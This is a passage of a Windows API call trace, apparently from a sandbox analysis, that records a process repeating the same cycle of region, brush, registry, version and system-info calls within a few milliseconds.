TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.542] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.542] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3b0401dc [0087.542] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3d0401d9 [0087.542] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x204026f [0087.542] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2040270 [0087.542] CombineRgn (hrgnDst=0x204026f, hrgnSrc1=0x3b0401dc, hrgnSrc2=0x3d0401d9, iMode=1) returned 1 [0087.542] CombineRgn (hrgnDst=0x2040270, hrgnSrc1=0x3b0401dc, hrgnSrc2=0x3d0401d9, iMode=4) returned 2 [0087.542] CreateSolidBrush (color=0xff) returned 0x310026e [0087.542] CreateSolidBrush (color=0xff0000) returned 0x2100271 [0087.542] DeleteObject (ho=0x2100271) returned 1 [0087.542] DeleteObject (ho=0x3d0401d9) returned 1 [0087.542] DeleteObject (ho=0x3b0401dc) returned 1 [0087.542] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.542] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.542] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.542] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.542] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.542] BeginPath (hdc=0x0) returned 0 [0087.542] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.542] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.542] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.542] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.543] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.543] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.543] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.543] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.543] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3e0401d9 [0087.543] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3c0401dc [0087.543] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406fc [0087.543] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406fd [0087.543] CombineRgn (hrgnDst=0x50406fc, hrgnSrc1=0x3e0401d9, hrgnSrc2=0x3c0401dc, iMode=1) returned 1 [0087.543] CombineRgn (hrgnDst=0x30406fd, hrgnSrc1=0x3e0401d9, hrgnSrc2=0x3c0401dc, iMode=4) returned 2 [0087.543] CreateSolidBrush (color=0xff) returned 0x3100271 [0087.543] CreateSolidBrush (color=0xff0000) returned 0x51006fe [0087.543] DeleteObject (ho=0x51006fe) returned 1 [0087.543] DeleteObject (ho=0x3c0401dc) returned 1 [0087.543] DeleteObject (ho=0x3e0401d9) returned 1 [0087.543] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.543] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.543] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.543] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.543] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.543] BeginPath (hdc=0x0) returned 0 [0087.543] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.543] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.543] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.543] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.543] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.543] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.543] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.543] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.543] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3d0401dc [0087.543] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3f0401d9 [0087.543] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406ff [0087.543] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x5040700 [0087.543] CombineRgn (hrgnDst=0x30406ff, hrgnSrc1=0x3d0401dc, hrgnSrc2=0x3f0401d9, iMode=1) returned 1 [0087.543] CombineRgn (hrgnDst=0x5040700, hrgnSrc1=0x3d0401dc, hrgnSrc2=0x3f0401d9, iMode=4) returned 2 [0087.543] CreateSolidBrush (color=0xff) returned 0x61006fe [0087.543] CreateSolidBrush (color=0xff0000) returned 0x3100701 [0087.544] DeleteObject (ho=0x3100701) returned 1 [0087.544] DeleteObject (ho=0x3f0401d9) returned 1 [0087.544] DeleteObject (ho=0x3d0401dc) returned 1 [0087.544] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.544] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.544] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.544] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.544] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.544] BeginPath (hdc=0x0) returned 0 [0087.544] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.544] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.544] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.544] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.544] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.544] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.544] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.544] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.544] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x400401d9 [0087.544] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3e0401dc [0087.544] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x5040702 [0087.544] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3040703 [0087.544] CombineRgn (hrgnDst=0x5040702, hrgnSrc1=0x400401d9, hrgnSrc2=0x3e0401dc, iMode=1) returned 1 [0087.544] CombineRgn (hrgnDst=0x3040703, hrgnSrc1=0x400401d9, hrgnSrc2=0x3e0401dc, iMode=4) returned 2 [0087.544] CreateSolidBrush (color=0xff) returned 0x4100701 [0087.544] CreateSolidBrush (color=0xff0000) returned 0x51006e8 [0087.544] DeleteObject (ho=0x51006e8) returned 1 [0087.544] DeleteObject (ho=0x3e0401dc) returned 1 [0087.544] DeleteObject (ho=0x400401d9) returned 1 [0087.544] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.544] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.544] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.544] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.544] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.544] BeginPath (hdc=0x0) returned 0 [0087.544] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.544] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.544] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.545] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.545] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.545] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.545] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.545] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.545] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3f0401dc [0087.545] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x410401d9 [0087.545] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406e9 [0087.545] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406ec [0087.545] CombineRgn (hrgnDst=0x30406e9, hrgnSrc1=0x3f0401dc, hrgnSrc2=0x410401d9, iMode=1) returned 1 [0087.545] CombineRgn (hrgnDst=0x50406ec, hrgnSrc1=0x3f0401dc, hrgnSrc2=0x410401d9, iMode=4) returned 2 [0087.545] CreateSolidBrush (color=0xff) returned 0x61006e8 [0087.545] CreateSolidBrush (color=0xff0000) returned 0x31006ed [0087.545] DeleteObject (ho=0x31006ed) returned 1 [0087.545] DeleteObject (ho=0x410401d9) returned 1 [0087.545] DeleteObject (ho=0x3f0401dc) returned 1 [0087.545] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.545] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.545] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.545] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.545] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.545] BeginPath (hdc=0x0) returned 0 [0087.545] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.545] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.545] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.545] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.545] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.545] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.545] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.545] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.545] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x420401d9 [0087.545] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x400401dc [0087.545] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406ea [0087.545] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406eb [0087.545] CombineRgn (hrgnDst=0x50406ea, hrgnSrc1=0x420401d9, hrgnSrc2=0x400401dc, iMode=1) returned 1 [0087.545] CombineRgn (hrgnDst=0x30406eb, hrgnSrc1=0x420401d9, hrgnSrc2=0x400401dc, iMode=4) returned 2 [0087.545] CreateSolidBrush (color=0xff) returned 0x41006ed [0087.545] CreateSolidBrush (color=0xff0000) returned 0x51006ee [0087.546] DeleteObject (ho=0x51006ee) returned 1 [0087.546] DeleteObject (ho=0x400401dc) returned 1 [0087.546] DeleteObject (ho=0x420401d9) returned 1 [0087.546] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.546] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.546] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.546] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.546] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.546] BeginPath (hdc=0x0) returned 0 [0087.546] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.546] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.546] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.546] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.546] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.546] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.546] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.546] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.546] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x410401dc [0087.546] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x430401d9 [0087.546] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406ef [0087.546] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406f0 [0087.546] CombineRgn (hrgnDst=0x30406ef, hrgnSrc1=0x410401dc, hrgnSrc2=0x430401d9, iMode=1) returned 1 [0087.546] CombineRgn (hrgnDst=0x50406f0, hrgnSrc1=0x410401dc, hrgnSrc2=0x430401d9, iMode=4) returned 2 [0087.546] CreateSolidBrush (color=0xff) returned 0x61006ee [0087.546] CreateSolidBrush (color=0xff0000) returned 0x31006f1 [0087.546] DeleteObject (ho=0x31006f1) returned 1 [0087.546] DeleteObject (ho=0x430401d9) returned 1 [0087.546] DeleteObject (ho=0x410401dc) returned 1 [0087.546] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.546] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.546] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.546] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.546] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.546] BeginPath (hdc=0x0) returned 0 [0087.546] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.546] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.546] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.546] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.546] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.546] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.546] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.547] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.547] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x440401d9 [0087.547] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x420401dc [0087.547] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406f4 [0087.547] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406f5 [0087.547] CombineRgn (hrgnDst=0x50406f4, hrgnSrc1=0x440401d9, hrgnSrc2=0x420401dc, iMode=1) returned 1 [0087.547] CombineRgn (hrgnDst=0x30406f5, hrgnSrc1=0x440401d9, hrgnSrc2=0x420401dc, iMode=4) returned 2 [0087.547] CreateSolidBrush (color=0xff) returned 0x41006f1 [0087.547] CreateSolidBrush (color=0xff0000) returned 0x51006f2 [0087.547] DeleteObject (ho=0x51006f2) returned 1 [0087.547] DeleteObject (ho=0x420401dc) returned 1 [0087.547] DeleteObject (ho=0x440401d9) returned 1 [0087.547] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.547] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.547] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.547] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.547] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.547] BeginPath (hdc=0x0) returned 0 [0087.547] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.547] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.547] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.547] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.547] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.547] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.547] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.547] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.547] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x430401dc [0087.547] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x450401d9 [0087.547] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406f3 [0087.547] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406f6 [0087.547] CombineRgn (hrgnDst=0x30406f3, hrgnSrc1=0x430401dc, hrgnSrc2=0x450401d9, iMode=1) returned 1 [0087.547] CombineRgn (hrgnDst=0x50406f6, hrgnSrc1=0x430401dc, hrgnSrc2=0x450401d9, iMode=4) returned 2 [0087.547] CreateSolidBrush (color=0xff) returned 0x61006f2 [0087.547] CreateSolidBrush (color=0xff0000) returned 0x31006f7 [0087.547] DeleteObject (ho=0x31006f7) returned 1 [0087.547] DeleteObject (ho=0x450401d9) returned 1 [0087.547] DeleteObject (ho=0x430401dc) returned 1 [0087.547] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.547] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.548] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.548] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.548] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.548] BeginPath (hdc=0x0) returned 0 [0087.548] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.548] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.548] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.548] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.548] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.548] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.548] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.548] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.548] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x460401d9 [0087.548] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x440401dc [0087.548] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406f8 [0087.548] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406f9 [0087.548] CombineRgn (hrgnDst=0x50406f8, hrgnSrc1=0x460401d9, hrgnSrc2=0x440401dc, iMode=1) returned 1 [0087.548] CombineRgn (hrgnDst=0x30406f9, hrgnSrc1=0x460401d9, hrgnSrc2=0x440401dc, iMode=4) returned 2 [0087.548] CreateSolidBrush (color=0xff) returned 0x41006f7 [0087.548] CreateSolidBrush (color=0xff0000) returned 0x51006fa [0087.548] DeleteObject (ho=0x51006fa) returned 1 [0087.548] DeleteObject (ho=0x440401dc) returned 1 